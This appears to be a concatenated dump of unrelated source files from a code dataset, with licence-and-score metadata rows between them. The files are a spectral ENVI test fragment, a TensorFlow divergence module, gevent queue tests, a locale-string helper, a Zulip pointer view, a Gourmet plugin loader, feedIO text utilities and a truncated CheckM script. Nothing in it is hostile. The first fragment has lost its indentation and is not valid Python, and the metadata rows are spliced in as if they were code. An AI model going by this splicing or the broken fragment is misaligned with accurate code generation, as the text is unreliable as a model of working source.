'''FileNotAnEnviHeader should be raised if "ENVI" not on first line.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_header_missing_ENVI_fails.hdr')
spy.envi.save_image(fname, img)
lines = open(fname).readlines()
fout = open(fname, 'w')
for line in lines[1:]:
fout.write(line)
fout.close()
try:
img2 = spy.envi.open(fname)
except spy.envi.FileNotAnEnviHeader:
pass
else:
            raise Exception('Failed to raise FileNotAnEnviHeader')
def run():
print('\n' + '-' * 72)
print('Running ENVI tests.')
print('-' * 72)
write_test = ENVIWriteTest()
write_test.run()
if __name__ == '__main__':
from spectral.tests.run import parse_args, reset_stats, print_summary
parse_args()
reset_stats()
run()
print_summary()
| gpl-2.0 | -3,295,892,582,417,661,400 | 36.12709 | 82 | 0.58265 | false | 3.656456 | true | false | false |
yufengg/tensorflow | tensorflow/contrib/bayesflow/python/ops/csiszar_divergence.py | 12 | 1562 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Csiszar f-Divergence and helpers.
See ${python/contrib.bayesflow.csiszar_divergence}.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.contrib.bayesflow.python.ops.csiszar_divergence_impl import *
# pylint: enable=wildcard-import
from tensorflow.python.util.all_util import remove_undocumented
_allowed_symbols = [
'amari_alpha',
'arithmetic_geometric',
'chi_square',
'dual_csiszar_function',
'jeffreys',
'jensen_shannon',
'kl_forward',
'kl_reverse',
'log1p_abs',
'modified_gan',
'monte_carlo_csiszar_f_divergence',
'pearson',
'squared_hellinger',
'symmetrized_csiszar_function',
'total_variation',
'triangular',
]
remove_undocumented(__name__, _allowed_symbols)
| apache-2.0 | 7,561,534,556,336,436,000 | 30.877551 | 80 | 0.689501 | false | 3.666667 | false | false | false |
mgadi/naemonbox | sources/psdash/gevent-1.0.1/greentest/test__queue.py | 3 | 10905 | from __future__ import with_statement
from greentest import TestCase, main, GenericGetTestCase
import gevent
from gevent.hub import get_hub
from gevent import util
from gevent import queue
from gevent.queue import Empty, Full
from gevent.event import AsyncResult
class TestQueue(TestCase):
def test_send_first(self):
self.switch_expected = False
q = queue.Queue()
q.put('hi')
self.assertEquals(q.get(), 'hi')
def test_send_last(self):
q = queue.Queue()
def waiter(q):
with gevent.Timeout(0.1):
self.assertEquals(q.get(), 'hi2')
return "OK"
p = gevent.spawn(waiter, q)
gevent.sleep(0.01)
q.put('hi2')
gevent.sleep(0.01)
assert p.get(timeout=0) == "OK"
def test_max_size(self):
q = queue.Queue(2)
results = []
def putter(q):
q.put('a')
results.append('a')
q.put('b')
results.append('b')
q.put('c')
results.append('c')
return "OK"
p = gevent.spawn(putter, q)
gevent.sleep(0)
self.assertEquals(results, ['a', 'b'])
self.assertEquals(q.get(), 'a')
gevent.sleep(0)
self.assertEquals(results, ['a', 'b', 'c'])
self.assertEquals(q.get(), 'b')
self.assertEquals(q.get(), 'c')
assert p.get(timeout=0) == "OK"
def test_zero_max_size(self):
q = queue.Channel()
def sender(evt, q):
q.put('hi')
evt.set('done')
def receiver(evt, q):
x = q.get()
evt.set(x)
e1 = AsyncResult()
e2 = AsyncResult()
p1 = gevent.spawn(sender, e1, q)
gevent.sleep(0.001)
self.assert_(not e1.ready())
p2 = gevent.spawn(receiver, e2, q)
self.assertEquals(e2.get(), 'hi')
self.assertEquals(e1.get(), 'done')
with gevent.Timeout(0):
gevent.joinall([p1, p2])
def test_multiple_waiters(self):
# tests that multiple waiters get their results back
q = queue.Queue()
def waiter(q, evt):
evt.set(q.get())
sendings = ['1', '2', '3', '4']
evts = [AsyncResult() for x in sendings]
for i, x in enumerate(sendings):
gevent.spawn(waiter, q, evts[i]) # XXX use waitall for them
gevent.sleep(0.01) # get 'em all waiting
results = set()
def collect_pending_results():
for e in evts:
with gevent.Timeout(0.001, False):
x = e.get()
results.add(x)
return len(results)
q.put(sendings[0])
self.assertEquals(collect_pending_results(), 1)
q.put(sendings[1])
self.assertEquals(collect_pending_results(), 2)
q.put(sendings[2])
q.put(sendings[3])
self.assertEquals(collect_pending_results(), 4)
def test_waiters_that_cancel(self):
q = queue.Queue()
def do_receive(q, evt):
with gevent.Timeout(0, RuntimeError()):
try:
result = q.get()
evt.set(result)
except RuntimeError:
evt.set('timed out')
evt = AsyncResult()
gevent.spawn(do_receive, q, evt)
self.assertEquals(evt.get(), 'timed out')
q.put('hi')
self.assertEquals(q.get(), 'hi')
def test_senders_that_die(self):
q = queue.Queue()
def do_send(q):
q.put('sent')
gevent.spawn(do_send, q)
self.assertEquals(q.get(), 'sent')
def test_two_waiters_one_dies(self):
def waiter(q, evt):
evt.set(q.get())
def do_receive(q, evt):
with gevent.Timeout(0, RuntimeError()):
try:
result = q.get()
evt.set(result)
except RuntimeError:
evt.set('timed out')
q = queue.Queue()
dying_evt = AsyncResult()
waiting_evt = AsyncResult()
gevent.spawn(do_receive, q, dying_evt)
gevent.spawn(waiter, q, waiting_evt)
gevent.sleep(0.1)
q.put('hi')
self.assertEquals(dying_evt.get(), 'timed out')
self.assertEquals(waiting_evt.get(), 'hi')
def test_two_bogus_waiters(self):
def do_receive(q, evt):
with gevent.Timeout(0, RuntimeError()):
try:
result = q.get()
evt.set(result)
except RuntimeError:
evt.set('timed out')
q = queue.Queue()
e1 = AsyncResult()
e2 = AsyncResult()
gevent.spawn(do_receive, q, e1)
gevent.spawn(do_receive, q, e2)
gevent.sleep(0.1)
q.put('sent')
self.assertEquals(e1.get(), 'timed out')
self.assertEquals(e2.get(), 'timed out')
self.assertEquals(q.get(), 'sent')
class TestChannel(TestCase):
def test_send(self):
channel = queue.Channel()
events = []
def another_greenlet():
events.append(channel.get())
events.append(channel.get())
g = gevent.spawn(another_greenlet)
events.append('sending')
channel.put('hello')
events.append('sent hello')
channel.put('world')
events.append('sent world')
self.assertEqual(['sending', 'hello', 'sent hello', 'world', 'sent world'], events)
g.get()
def test_wait(self):
channel = queue.Channel()
events = []
def another_greenlet():
events.append('sending hello')
channel.put('hello')
events.append('sending world')
channel.put('world')
events.append('sent world')
g = gevent.spawn(another_greenlet)
events.append('waiting')
events.append(channel.get())
events.append(channel.get())
self.assertEqual(['waiting', 'sending hello', 'hello', 'sending world', 'world'], events)
gevent.sleep(0)
self.assertEqual(['waiting', 'sending hello', 'hello', 'sending world', 'world', 'sent world'], events)
g.get()
def test_task_done(self):
channel = queue.JoinableQueue(0)
X = object()
gevent.spawn(channel.put, X)
result = channel.get()
assert result is X, (result, X)
assert channel.unfinished_tasks == 1, channel.unfinished_tasks
channel.task_done()
assert channel.unfinished_tasks == 0, channel.unfinished_tasks
class TestNoWait(TestCase):
def test_put_nowait_simple(self):
result = []
q = queue.Queue(1)
def store_result(func, *args):
result.append(func(*args))
run_callback = get_hub().loop.run_callback
run_callback(store_result, util.wrap_errors(Full, q.put_nowait), 2)
run_callback(store_result, util.wrap_errors(Full, q.put_nowait), 3)
gevent.sleep(0)
assert len(result) == 2, result
assert result[0] is None, result
assert isinstance(result[1], queue.Full), result
def test_get_nowait_simple(self):
result = []
q = queue.Queue(1)
q.put(4)
def store_result(func, *args):
result.append(func(*args))
run_callback = get_hub().loop.run_callback
run_callback(store_result, util.wrap_errors(Empty, q.get_nowait))
run_callback(store_result, util.wrap_errors(Empty, q.get_nowait))
gevent.sleep(0)
assert len(result) == 2, result
assert result[0] == 4, result
assert isinstance(result[1], queue.Empty), result
# get_nowait must work from the mainloop
def test_get_nowait_unlock(self):
result = []
q = queue.Queue(1)
p = gevent.spawn(q.put, 5)
def store_result(func, *args):
result.append(func(*args))
assert q.empty(), q
gevent.sleep(0)
assert q.full(), q
get_hub().loop.run_callback(store_result, q.get_nowait)
gevent.sleep(0)
assert q.empty(), q
assert result == [5], result
assert p.ready(), p
assert p.dead, p
assert q.empty(), q
def test_get_nowait_unlock_channel(self):
result = []
q = queue.Channel()
p = gevent.spawn(q.put, 5)
def store_result(func, *args):
result.append(func(*args))
assert q.empty(), q
assert q.full(), q
gevent.sleep(0.001)
assert q.empty(), q
assert q.full(), q
get_hub().loop.run_callback(store_result, q.get_nowait)
gevent.sleep(0.001)
assert q.empty(), q
assert q.full(), q
assert result == [5], result
assert p.ready(), p
assert p.dead, p
assert q.empty(), q
# put_nowait must work from the mainloop
def test_put_nowait_unlock(self):
result = []
q = queue.Queue()
p = gevent.spawn(q.get)
def store_result(func, *args):
result.append(func(*args))
assert q.empty(), q
assert not q.full(), q
gevent.sleep(0.001)
assert q.empty(), q
assert not q.full(), q
get_hub().loop.run_callback(store_result, q.put_nowait, 10)
assert not p.ready(), p
gevent.sleep(0.001)
assert result == [None], result
assert p.ready(), p
assert not q.full(), q
assert q.empty(), q
class TestJoinEmpty(TestCase):
def test_issue_45(self):
"""Test that join() exits immediatelly if not jobs were put into the queue"""
self.switch_expected = False
q = queue.JoinableQueue()
q.join()
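# Class factories: build one GenericGetTestCase subclass per queue type so
# the get()/put() timeout (interrupt) behavior is exercised for every queue
# flavor; the generated classes are injected into globals() below.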
def make_get_interrupt(queue_type):
class TestGetInterrupt(GenericGetTestCase):
Timeout = Empty
def wait(self, timeout):
return queue_type().get(timeout=timeout)
TestGetInterrupt.__name__ += '_' + queue_type.__name__
return TestGetInterrupt
for queue_type in [queue.Queue, queue.JoinableQueue, queue.LifoQueue, queue.PriorityQueue, queue.Channel]:
klass = make_get_interrupt(queue_type)
globals()[klass.__name__] = klass
del klass, queue_type
def make_put_interrupt(queue):
class TestPutInterrupt(GenericGetTestCase):
Timeout = Full
def wait(self, timeout):
while not queue.full():
queue.put(1)
return queue.put(2, timeout=timeout)
TestPutInterrupt.__name__ += '_' + queue.__class__.__name__
return TestPutInterrupt
for obj in [queue.Queue(1), queue.JoinableQueue(1), queue.LifoQueue(1), queue.PriorityQueue(1), queue.Channel()]:
klass = make_put_interrupt(obj)
globals()[klass.__name__] = klass
del klass, obj
del GenericGetTestCase
if __name__ == '__main__':
main()
| gpl-2.0 | 488,388,398,618,766,660 | 27.033419 | 113 | 0.546905 | false | 3.757753 | true | false | false |
lig/i18n-string | i18n_string.py | 1 | 1420 | from collections import Mapping
from locale import getdefaultlocale, normalize
def normalize_lang(lang):
return normalize(lang).split('.')[0]
def get_default_lang():
return getdefaultlocale()[0]
class LocaleDict(dict):
def __new__(cls, data=None):
self = dict.__new__(cls)
if data:
if not isinstance(data, Mapping):
                raise ValueError(
                    'Initial data must be a mapping instance')
for k, v in data.items():
self[normalize_lang(k)] = unicode(v)
return self
def __init__(self, *args, **kwargs):
pass
def __getitem__(self, key):
return super(LocaleDict, self).__getitem__(normalize_lang(key))
def __setitem__(self, key, value):
return super(LocaleDict, self).__setitem__(
normalize_lang(key), unicode(value))
class MultilingualString(unicode):
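    """A unicode string that carries translations keyed by normalized locale.

    The string's own value is the translation for default_language
    (falling back to the process default locale); the other languages
    stay reachable through translate().
    """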
def __new__(cls, translations=None, default_language=None):
language = (default_language and normalize_lang(default_language) or
get_default_lang())
translations = LocaleDict(translations)
value = translations.get(language, u'')
self = unicode.__new__(cls, value)
self.language = language
self.translations = translations
return self
def translate(self, language):
return self.__class__(self.translations, language)
| bsd-2-clause | -1,428,376,439,097,220,900 | 25.792453 | 76 | 0.607042 | false | 4.396285 | false | false | false |
rishig/zulip | zerver/views/pointer.py | 1 | 1173 |
from django.http import HttpRequest, HttpResponse
from django.utils.translation import ugettext as _
from zerver.decorator import to_non_negative_int
from zerver.lib.actions import do_update_pointer
from zerver.lib.request import has_request_variables, JsonableError, REQ
from zerver.lib.response import json_success
from zerver.models import UserProfile, get_usermessage_by_message_id
def get_pointer_backend(request: HttpRequest, user_profile: UserProfile) -> HttpResponse:
return json_success({'pointer': user_profile.pointer})
@has_request_variables
def update_pointer_backend(request: HttpRequest, user_profile: UserProfile,
pointer: int=REQ(converter=to_non_negative_int)) -> HttpResponse:
if pointer <= user_profile.pointer:
return json_success()
if get_usermessage_by_message_id(user_profile, pointer) is None:
raise JsonableError(_("Invalid message ID"))
request._log_data["extra"] = "[%s]" % (pointer,)
    update_flags = (request.client.name.lower() in ['android', 'zulipandroid'])
do_update_pointer(user_profile, request.client, pointer, update_flags=update_flags)
return json_success()
| apache-2.0 | 5,036,255,552,979,921,000 | 42.444444 | 92 | 0.737425 | false | 3.949495 | false | false | false |
kirienko/gourmet | src/gourmet/plugin_loader.py | 1 | 16825 | import glob
import logging
import os.path
import sys
import traceback
from typing import Dict, List
import pkg_resources
from gourmet import gglobals
from gourmet.prefs import Prefs
from .defaults.defaults import loc
from .gdebug import debug
PRE = 0
POST = 1
try:
current_path = os.path.split(os.path.join(os.getcwd(), __file__))[0]
except IndexError:
current_path = ''
class MasterLoader:
"""This module provides a base class for loading plugins. Everything
that is plug-in-able in Gourmet should subclass the plugin loader.
Everything that is a plugin needs to provide a python module with a plugins
attribute containing the plugin classes that make up the plugin.
In addition, we need a .gourmet-plugin configuration file pointing to the
module (with the module parameter) and giving the name and comment for the
plugin.
"""
__single = None
default_active_plugin_sets = [
# tools
'unit_converter',
'duplicate_finder',
'spellcheck',
# import/export
'gxml_plugin',
'html_plugin',
'mastercook_import_plugin',
'mealmaster_plugin',
'archive_plugin',
'pdf_plugin',
'plaintext_plugin',
'web_import_plugin',
'website_import_plugins',
'krecipe_plugin',
'mycookbook_plugin',
'epub_plugin',
'copy_paste_plugin'
]
@classmethod
def instance(cls):
if MasterLoader.__single is None:
MasterLoader.__single = MasterLoader()
return MasterLoader.__single
def __init__(self):
# TODO!!! Discover plugins using namespace packages(?)
# If gourmet is running as a built (i.e., non-source) distribution,
# this is probably not going to work with bundled plugins.
self.plugin_directories = [
# user plug-ins
os.path.join(gglobals.gourmetdir, 'plugins'),
# bundled plugins
os.path.join(current_path, 'plugins'),
os.path.join(current_path, 'plugins', 'import_export'),
]
self.errors = dict()
self.pluggables_by_class: Dict = dict()
self.active_plugin_sets: List[str] = []
self.available_plugin_sets: Dict[str, LegacyPlugin] = self.load_legacy_plugins(self.plugin_directories) # noqa
self.available_plugin_sets.update(self.load_plugins_from_namespace())
self.load_active_plugins()
@staticmethod
def load_legacy_plugins(directories: List[str]) -> Dict[str, object]:
"""Look through plugin directories for legacy gourmet-plugins."""
ret: Dict[str, object] = {}
for d in directories:
debug('Loading plugins from %s'%os.path.realpath(d),1)
plugins = glob.glob(os.path.join(d, '*.gourmet-plugin'))
for ppath in plugins:
debug('Found %s'%ppath,1)
plugin_set = LegacyPlugin(ppath)
if plugin_set.module in ret.keys():
print('Ignoring duplicate plugin ',plugin_set.module,'found in ',ppath)
else:
ret[plugin_set.module] = plugin_set
return ret
@staticmethod
def load_plugins_from_namespace() -> Dict[str, object]:
"""Look for plugins in the gourmet.plugins namespace."""
debug('Loading plugins from namespace', 1)
exporters = list(pkg_resources.iter_entry_points('gourmet.plugins.exporters'))
file_importers = list(pkg_resources.iter_entry_points('gourmet.plugins.fileimporters'))
web_importers = list(pkg_resources.iter_entry_points('gourmet.plugins.webimporters'))
ret: Dict[str, object] = {}
for entrypoint in exporters:
try:
plugin = entrypoint.load()
except BaseException as e: # ModuleNotFoundError, ImportError, etc.
print(f'Could not load plugin {entrypoint}: {e}')
else:
ret[entrypoint.name] = Plugin(plugin)
return ret
def load_active_plugins(self):
"""Enable plugins that were previously saved to the preferences"""
prefs = Prefs.instance()
self.active_plugin_sets = prefs.get(
'plugins',
list(self.default_active_plugin_sets))
self.active_plugins = []
self.instantiated_plugins = {}
for p in self.active_plugin_sets:
if p in self.available_plugin_sets:
try:
self.active_plugins.extend(self.available_plugin_sets[p].plugins)
except:
print('WARNING: Failed to load plugin %s'%p)
self.errors[p] = traceback.format_exc()
logging.exception('')
else:
print('Plugin ',p,'not found')
def save_active_plugins(self):
prefs = Prefs.instance()
prefs['plugins'] = self.active_plugin_sets
prefs.save()
def check_dependencies(self, plugin_set):
if plugin_set.dependencies:
missing = []
depends = plugin_set.dependencies or []
for dep in depends:
                if dep not in self.active_plugin_sets:
missing.append(dep)
if missing:
raise DependencyError(plugin_set,missing)
def check_if_depended_upon (self, plugin_set):
"""Return a list of active plugin set objects that depend on
plugin_set.
"""
depending_on_me = []
for module in self.active_plugin_sets:
if module in self.available_plugin_sets:
ps = self.available_plugin_sets[module]
if ps.dependencies:
try:
if plugin_set.module in ps.dependencies:
depending_on_me.append(ps)
except:
                        print('Problem checking dependencies of ', ps, ps.dependencies)
raise
return depending_on_me
def activate_plugin_set(self, plugin_set: 'LegacyPlugin'):
"""Activate a set of plugins.
"""
if plugin_set in self.active_plugin_sets:
return
self.check_dependencies(plugin_set)
# plugin_set.get_module() returns None if there's been a
# problem -- we want to raise that problem now.
if plugin_set.get_module() is None:
e = plugin_set.error
self.errors[plugin_set] = f"{type(e).__name__}: {e}"
raise e
self.active_plugin_sets.append(plugin_set.module)
self.active_plugins.extend(plugin_set.plugins)
for plugin in plugin_set.plugins:
for klass in list(self.pluggables_by_class.keys()):
if issubclass(plugin,klass):
for pluggable in self.pluggables_by_class[klass]:
pluggable.plugin_plugin(self.get_instantiated_plugin(plugin))
def deactivate_plugin_set (self, plugin_set: 'LegacyPlugin'):
# Deactivate any plugin sets that depend upon us...
for ps in self.check_if_depended_upon(plugin_set):
self.deactivate_plugin_set(ps)
if plugin_set.module in self.active_plugin_sets:
self.active_plugin_sets.remove(plugin_set.module)
else:
print('Odd',plugin_set.module,'is not listed as active.')
if plugin_set.get_module():
for plugin in plugin_set.plugins:
for klass in list(self.pluggables_by_class.keys()):
if issubclass(plugin,klass):
for pluggable in self.pluggables_by_class[klass]:
plugin().deactivate(pluggable)
if plugin in self.instantiated_plugins:
self.instantiated_plugins[plugin].remove()
self.active_plugins.remove(plugin)
def get_instantiated_plugin (self, plugin):
if plugin in self.instantiated_plugins:
return self.instantiated_plugins[plugin]
else:
debug('Instantiate %s from %s'%(plugin,
plugin.__module__),
1)
self.instantiated_plugins[plugin] = plugin()
return self.instantiated_plugins[plugin]
def register_pluggable (self, pluggable, klass):
if klass not in self.pluggables_by_class:
self.pluggables_by_class[klass] = []
self.pluggables_by_class[klass].append(pluggable)
for p in self.active_plugins:
if issubclass(p,klass):
try:
plugin_instance = self.get_instantiated_plugin(p)
except:
print('WARNING: Failed to instantiate plugin %s of type %s'%(p,klass))
self.errors[p] = traceback.format_exc()
traceback.print_exc()
else:
pluggable.plugin_plugin(plugin_instance)
def unregister_pluggable (self, pluggable, klass):
self.pluggables_by_class[klass].remove(pluggable)
class Plugin:
"""Load a plugin from the gourmet-plugins namespace."""
def __init__(self, plugin_class: type):
self.props = dict.fromkeys(
['Name', 'Comment', 'Authors', 'Version', 'API_Version', 'Website',
'Copyright','Dependencies'])
self._loaded = plugin_class
self.name = plugin_class.__name__
self.comment = self._loaded.__doc__.split('\n')[0]
self.authors = plugin_class.AUTHOR
self.api_version = 2.0
self.copyright = plugin_class.COPYRIGHT
self.website = plugin_class.WEBSITE
attrs = pkg_resources.require(self.name)[0]
self.version = attrs.version
# The following is a backward compatibility hack: pip took care to
# install the plugin and its dependencies.
# Moreover, Gtk bindings are packaged as pygobject but installed as gi.
# We have it anyway.
self.dependencies = [r.name for r in attrs.requires()]
        if 'pygobject' in self.dependencies:
            self.dependencies.remove('pygobject')
self.module = plugin_class.__module__
self.plugins = [plugin_class]
def get_module(self):
return self._loaded
class LegacyPlugin:
"""A lazy-loading set of plugins.
This class encapsulates what to the end-user is a plugin.
From our perspective, plugins can really be a bundle of plugins --
for example, your plugin might require a DatabasePlugin, a
RecCardDisplayPlugin and a MainPlugin to function.
"""
_loaded = None
def __init__(self, plugin_info_path: str):
with open(plugin_info_path, 'r') as fin:
self.load_plugin_file_data(fin)
self.curdir, plugin_info_file = os.path.split(plugin_info_path)
self.plugin_modules_dir = os.path.join(os.path.dirname(__file__),
'plugins')
self.import_export_modules_dir = os.path.join(self.plugin_modules_dir,
'import_export')
self.module = self.props['Module']
def get_module(self):
if self._loaded is not None:
return self._loaded
else:
if self.curdir not in sys.path:
sys.path.append(self.curdir)
if self.plugin_modules_dir not in sys.path:
sys.path.append(self.plugin_modules_dir)
if self.import_export_modules_dir not in sys.path:
sys.path.append(self.import_export_modules_dir)
try:
self._loaded = __import__(self.module)
except ImportError as ie:
print('WARNING: Plugin module import failed')
print('PATH:', sys.path)
traceback.print_exc()
self.error = ie
return None
else:
return self._loaded
def __getattr__ (self, attr):
if attr == 'plugins':
return self.get_plugins()
elif attr in self.props:
return self.props[attr]
elif attr.capitalize() in self.props:
return self.props[attr.capitalize()]
raise AttributeError
def get_plugins(self):
return self.get_module().plugins
def load_plugin_file_data (self,plugin_info_file):
# This should really use GKeyFile but there are no python
# bindings that I can find atm. One possibility would be to
# use this:
# http://svn.async.com.br/cgi-bin/viewvc.cgi/kiwi/trunk/kiwi/desktopparser.py?revision=7336&view=markup
self.props = dict.fromkeys(
['Name', 'Comment', 'Authors', 'Version', 'API_Version',
'Website', 'Copyright', 'Dependencies'])
for line in plugin_info_file.readlines():
if '[Gourmet Plugin]' in line:
pass
elif line.find('=')>0:
key,val = line.split('=')
key = key.strip(); val = val.strip()
key = key.strip('_')
if (loc is not None) and ('[' in key):
key,locale = key.strip(']').split('[')
if locale==loc:
self.props[key] = val
elif locale[:2]==loc[:2]:
self.props[key] = val
else:
self.props[key]=val
else:
print('Ignoring line',line)
if self.dependencies:
self.props['Dependencies'] = [d.strip() for d in self.dependencies.split(',')]
class Pluggable:
"""A plugin-able class."""
def __init__ (self, plugin_klasses):
"""plugin_klasses is the list class of which each of our
plugins should be a sub-class.
A pluggable can take multiple types of sub-classes if it
likes.
"""
#print 'Pluggable.__init__([',plugin_klasses,'])'
self.pre_hooks = {} # stores hooks to be run before methods by
# method name
self.post_hooks = {} # stores hooks to be run after methods by
# method name
self.loader = MasterLoader.instance()
self.klasses = plugin_klasses
self.plugins = []
for klass in self.klasses:
#print 'register self ',self,'as pluggable for ',klass
self.loader.register_pluggable(self,klass)
def plugin_plugin (self, plugin_instance):
try:
self.plugins.append(plugin_instance)
plugin_instance.activate(self)
except:
print('WARNING: PLUGIN FAILED TO LOAD',plugin_instance)
traceback.print_exc()
def destroy (self):
self.loader.unregister_pluggable(self,self.klass)
for pi in self.plugins:
pi.deactivate(self)
def run_pre_hook (self, fname, *args, **kwargs):
for hook in self.pre_hooks.get(fname,[]):
try:
                new_args, new_kwargs = hook(self, *args, **kwargs)
                assert isinstance(new_args, tuple)
                assert isinstance(new_kwargs, dict)
except:
print('WARNING',hook,'did not return args,kwargs')
else:
args,kwargs = new_args,new_kwargs
return args,kwargs
def run_post_hook (self, fname, retval, *args, **kwargs):
for hook in self.post_hooks.get(fname,[]):
retval = hook(retval,self,*args,**kwargs)
return retval
def add_hook (self, type, name, hook):
if type==PRE: hookdic = self.pre_hooks
else: hookdic = self.post_hooks
if name not in hookdic:
hookdic[name] = []
hookdic[name].append(hook)
def remove_hook (self, type, name, hook):
if type==PRE: hookdic = self.pre_hooks
else: hookdic = self.post_hooks
        if name in hookdic and hook in hookdic[name]:
            hookdic[name].remove(hook)
def get_plugin_by_module (self, module):
for p in self.plugins:
if p.__module__ == module:
return p
class DependencyError (Exception):
def __init__ (self, pluginset, missing_dependencies):
self.plugin_set = pluginset
self.dependencies = missing_dependencies
print(self.plugin_set,'requires but did not find',self.dependencies)
def __repr__ (self):
return ('<DependencyError '
+ repr(self.plugin_set)
+ ' missing required dependencies '
+ repr(self.dependencies)
)
def pluggable_method (f):
def _ (self, *args, **kwargs):
'''Run hooks around method'''
args,kwargs = self.run_pre_hook(f.__name__,*args,**kwargs)
retval = f(self,*args,**kwargs)
retval = self.run_post_hook(f.__name__,retval,*args,**kwargs)
return retval
return _
| gpl-2.0 | -8,503,242,675,846,742,000 | 36.979684 | 119 | 0.571352 | false | 4.193669 | false | false | false |
seejay/feedIO | feedio/purify.py | 1 | 2483 | #!/usr/bin/python
"""
Text-manipulation helpers for feedIO.

Currently provides:
    cleanText() to strip any markup tags and make a text readable.
    shorten() to shorten a long text to a predefined size.

To be used with the feedIO tts feature and for classification of the article text.

TODO: find better ways to do this.
"""
__version__ = "0.0.5"
__license__ = """
Copyright (C) 2011 Sri Lanka Institute of Information Technology.
feedIO is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
feedIO is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with feedIO. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = "Chanaka Jayamal <[email protected]>"
__developers__ = ["Chanaka Jayamal",
"Lanka Amarasekara",
"Kolitha Gajanayake",
"Chamika Viraj"]
import HTMLParser
import tinyurl
SHORTEN_LENGTH = 100
class Purify(HTMLParser.HTMLParser):
def __init__(self):
self.reset()
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def getData(self):
return ''.join(self.fed)
# Function to clean an article text.
def cleanText(text):
"""
    function to strip any tags and make a text readable.
"""
    p = Purify()
    p.feed(text)
    data = p.getData()
    data = data.strip()
    # remove the trailing "More" link that appears in some feeds;
    # strip("\tMore") would remove any of those characters from both ends,
    # so drop the exact suffix instead.
    stripped = data[:-len("More")].rstrip() if data.endswith("More") else data
#to fix the UnicodeEncodeError exception that occurs in some texts
stripped = stripped.encode('utf8')
return stripped
#function to summarize a text to be given a sneak peak.
def shorten(text, numChars=SHORTEN_LENGTH):
"""
    function to shorten a long text to a predefined size.
"""
info = (text[:numChars] + '..') if len(text) > numChars else text
return info
def shortenUrl(url):
"""
function to shorten a long Url.
"""
try:
shortUrl = tinyurl.create_one(url)
except:
return False
return shortUrl
| gpl-3.0 | -7,916,118,449,881,894,000 | 26.285714 | 82 | 0.664116 | false | 3.879688 | false | false | false |
fw1121/CheckM | scripts/createTaxonomicSpecificMarkerSets.py | 3 | 10651 | #!/usr/bin/env python
###############################################################################
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
__prog_name__ = 'TaxonomicMarkerSets'
__prog_desc__ = 'create taxonomic-specific marker sets'
__author__ = 'Donovan Parks'
__copyright__ = 'Copyright 2013'
__credits__ = ['Donovan Parks']
__license__ = 'GPL3'
__version__ = '0.0.1'
__maintainer__ = 'Donovan Parks'
__email__ = '[email protected]'
__status__ = 'Development'
import os
import sys
import argparse
import multiprocessing as mp
from checkm.util.img import IMG
from checkm.util.taxonomyUtils import rankPrefixes, ranksByLevel
from lib.markerSetBuilder import MarkerSetBuilder
class TaxonomicMarkerSets(object):
def __init__(self):
pass
def __workerThread(self, ubiquityThreshold, singleCopyThreshold,
minGenomes,
colocatedDistThreshold, colocatedGenomeThreshold,
metadata,
queueIn, queueOut):
"""Process each data item in parallel."""
img = IMG('/srv/whitlam/bio/db/checkm/img/img_metadata.tsv', '/srv/whitlam/bio/db/checkm/pfam/tigrfam2pfam.tsv')
markerSetBuilder = MarkerSetBuilder()
while True:
lineage = queueIn.get(block=True, timeout=None)
            if lineage is None:
break
if lineage == 'Universal':
genomeIds = img.genomeIdsByTaxonomy('prokaryotes', metadata)
else:
genomeIds = img.genomeIdsByTaxonomy(lineage, metadata)
if len(genomeIds) >= minGenomes:
markerSet = markerSetBuilder.buildMarkerSet(genomeIds, ubiquityThreshold, singleCopyThreshold, colocatedDistThreshold)
colocatedSets = markerSet.markerSet
else:
colocatedSets = None
# allow results to be processed or written to file
queueOut.put((lineage, colocatedSets, len(genomeIds)))
def __writerThread(self, pfamIdToPfamAcc,
ubiquityThreshold, singleCopyThreshold,
colocatedDistThreshold, colocatedGenomeThreshold,
outputDir, numDataItems, writerQueue):
"""Store or write results of worker threads in a single thread."""
#taxonSetOut = open(os.path.join('..', 'data', 'taxon_marker_sets.tsv'), 'w')
taxonSetOut = open(os.path.join('.', 'data', 'taxon_marker_sets.tsv'), 'w')
processedItems = 0
while True:
lineage, colocatedSets, numGenomes = writerQueue.get(block=True, timeout=None)
            if lineage is None:
break
processedItems += 1
statusStr = 'Finished processing %d of %d (%.2f%%) lineages.' % (processedItems, numDataItems, float(processedItems)*100/numDataItems)
sys.stdout.write('%s\r' % statusStr)
sys.stdout.flush()
            if colocatedSets is not None:
taxonomy = [x.strip() for x in lineage.split(';')]
rankPrefix = rankPrefixes[len(taxonomy)-1]
cladeName = taxonomy[-1].strip().replace(' ', '_')
fout = open(os.path.join(outputDir, rankPrefix + cladeName + '.txt'), 'w')
fout.write('# Taxonomic Marker Set\n')
fout.write('LINEAGE\t' + lineage + '\n')
fout.write('GENOME\t' + str(numGenomes) + '\n')
fout.write('UBIQUITY\t' + str(ubiquityThreshold) + '\n')
fout.write('SINGLE_COPY\t' + str(singleCopyThreshold) + '\n')
fout.write('COLOCATED_DISTANCE\t' + str(colocatedDistThreshold) + '\n')
